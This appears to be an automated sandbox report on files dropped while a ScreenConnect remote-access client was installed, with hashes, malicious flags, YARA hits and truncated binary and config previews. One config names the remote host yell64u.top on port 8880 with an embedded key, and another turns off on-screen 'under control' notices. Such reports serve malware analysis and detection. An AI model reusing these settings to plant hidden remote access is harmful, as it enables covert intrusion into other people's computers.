                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):601376
                                                              Entropy (8bit):6.185921191564225
                                                              Encrypted:false
                                                              SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                              MD5:20AB8141D958A58AADE5E78671A719BF
                                                              SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                              SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                              SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:true
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):842248
                                                              Entropy (8bit):6.268561504485627
                                                              Encrypted:false
                                                              SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                              MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                              SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                              SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                              SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):81696
                                                              Entropy (8bit):5.862223562830496
                                                              Encrypted:false
                                                              SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                              MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                              SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                              SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                              SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.842791478883622
                                                              Encrypted:false
                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):3343
                                                              Entropy (8bit):4.771733209240506
                                                              Encrypted:false
                                                              SSDEEP:96:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHlHgHyHNHtH29PtxA2oFHX:opPN
                                                              MD5:9322751577F16A9DB8C25F7D7EDD7D9F
                                                              SHA1:DC74AD5A42634655BCBA909DB1E2765F7CDDFB3D
                                                              SHA-256:F1A3457E307D721EF5B63FDB0D5E13790968276862EF043FB62CCE43204606DF
                                                              SHA-512:BB0C662285D7B95B7FAA05E9CC8675B81B33E6F77B0C50F97C9BC69D30FB71E72A7EAF0AFC71AF0C646E35B9EADD1E504A35D5D25847A29FD6D557F7ABD903AB
                                                              Malicious:false
                                                              Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:XML 1.0 document, ASCII text, with very long lines (449), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):939
                                                              Entropy (8bit):5.796466792414452
                                                              Encrypted:false
                                                              SSDEEP:24:2dL9hK6E4dl/nuuAnCiCBrxKrlI3ZXfePI9Rp3vH:chh7HHnDAnCPrxKa3lff3v
                                                              MD5:10ACBCF7D80CC0D8D0D67FF0987D0189
                                                              SHA1:00E379C7CDFAB98198FFEF891BAD17231262CF66
                                                              SHA-256:4A4C00DA35C8FB61FF854E9D9916E74CE0433DEC574673C41D70A9374C5C7636
                                                              SHA-512:6ABBA073E467B6152A6B828B8E07BBC4794656CA6F040CE0D132A717CA483A9E7756B7EDBD414AC9A4A032D31FC1570DE72855A7F35386CB1AE90BC890A1CCD9
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=yell64u.top&amp;p=8880&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):746
                                                              Entropy (8bit):5.349174276064173
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                              MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                              SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                              SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                              SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                              Category:dropped
                                                              Size (bytes):1086792
                                                              Entropy (8bit):7.793516535218678
                                                              Encrypted:false
                                                              SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                              MD5:30CA21632F98D354A940903214AE4DE1
                                                              SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                              SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                              SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):234
                                                              Entropy (8bit):4.977464602412109
                                                              Encrypted:false
                                                              SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                              MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                              SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                              SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                              SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                              Malicious:false
                                                              Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):49152
                                                              Entropy (8bit):4.62694170304723
                                                              Encrypted:false
                                                              SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                              MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                              SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                              SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                              SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):36864
                                                              Entropy (8bit):4.340550904466943
                                                              Encrypted:false
                                                              SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                              MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                              SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                              SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                              SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):57344
                                                              Entropy (8bit):4.657268358041957
                                                              Encrypted:false
                                                              SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                              MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                              SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                              SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                              SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):176128
                                                              Entropy (8bit):5.775360792482692
                                                              Encrypted:false
                                                              SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                              MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                              SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                              SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                              SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):11776
                                                              Entropy (8bit):5.267782165666963
                                                              Encrypted:false
                                                              SSDEEP:192:TY8/Qp6lCJuV3jnXtyVNamVNG1YZfCrMmbfHJ7kjvLQbuLd9NEFbOhmX:Z/cBJaLXt2NaheUrMmb/FkjvLQbuZZmX
                                                              MD5:5060FA094CE77A1DB1BEB4010F3C2306
                                                              SHA1:93B017A300C14CEEBA12AFBC23573A42443D861D
                                                              SHA-256:25C495FB28889E0C4D378309409E18C77F963337F790FEDFBB13E5CC54A23243
                                                              SHA-512:2384A0A8FC158481E969F66958C4B7D370BE4219046AB7D77E93E90F7F1C3815F23B47E76EFD8129234CCCB3BCAC2AA8982831D8745E0B733315C1CCF3B1973D
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m............." ..0..&..........&E... ...`....... ..............................t.....@..................................D..O....`..............................$D..8............................................ ............... ..H............text...,%... ...&.................. ..`.rsrc........`.......(..............@..@.reloc...............,..............@..B.................E......H........'.......................C........................................(....*^.(.......&...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s.......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~..........s....%......(...+%-.&+.(...........s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(.....*.{....s .....-..o!.......{....r}..p.o
                                                              Process:C:\Windows\SysWOW64\rundll32.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13422592
                                                              Entropy (8bit):7.966821211716796
                                                              Encrypted:false
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
                                                              MD5:ED78BAD542629E617AE49DFEFFABCFCC
                                                              SHA1:BF5EFE919B3C3561C433D9D4CD0F323A9359017E
                                                              SHA-256:86231CCA7231E3905A7317D07350C19F3923E24F34732C0AA6C022599913B1A3
                                                              SHA-512:45157229E4E2F6C5730ED1D1A233928538D7C7C71F549D8552CBE077F6DC22F7CDC390631696E8024C443B69979D8B4D8983142B6B93375ECE5B4F4F4609AA3F
                                                              Malicious:false
                                                              Preview:......................>.......................................................{...j...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {64D6109D-BB46-4239-08D9-EC110E53E92E}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                              Category:dropped
                                                              Size (bytes):13422592
                                                              Entropy (8bit):7.966821211716796
                                                              Encrypted:false
                                                              SSDEEP:196608:h53JLR3LGMLiW35+53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53JZ:bTiuyTXTtTPTkTzT
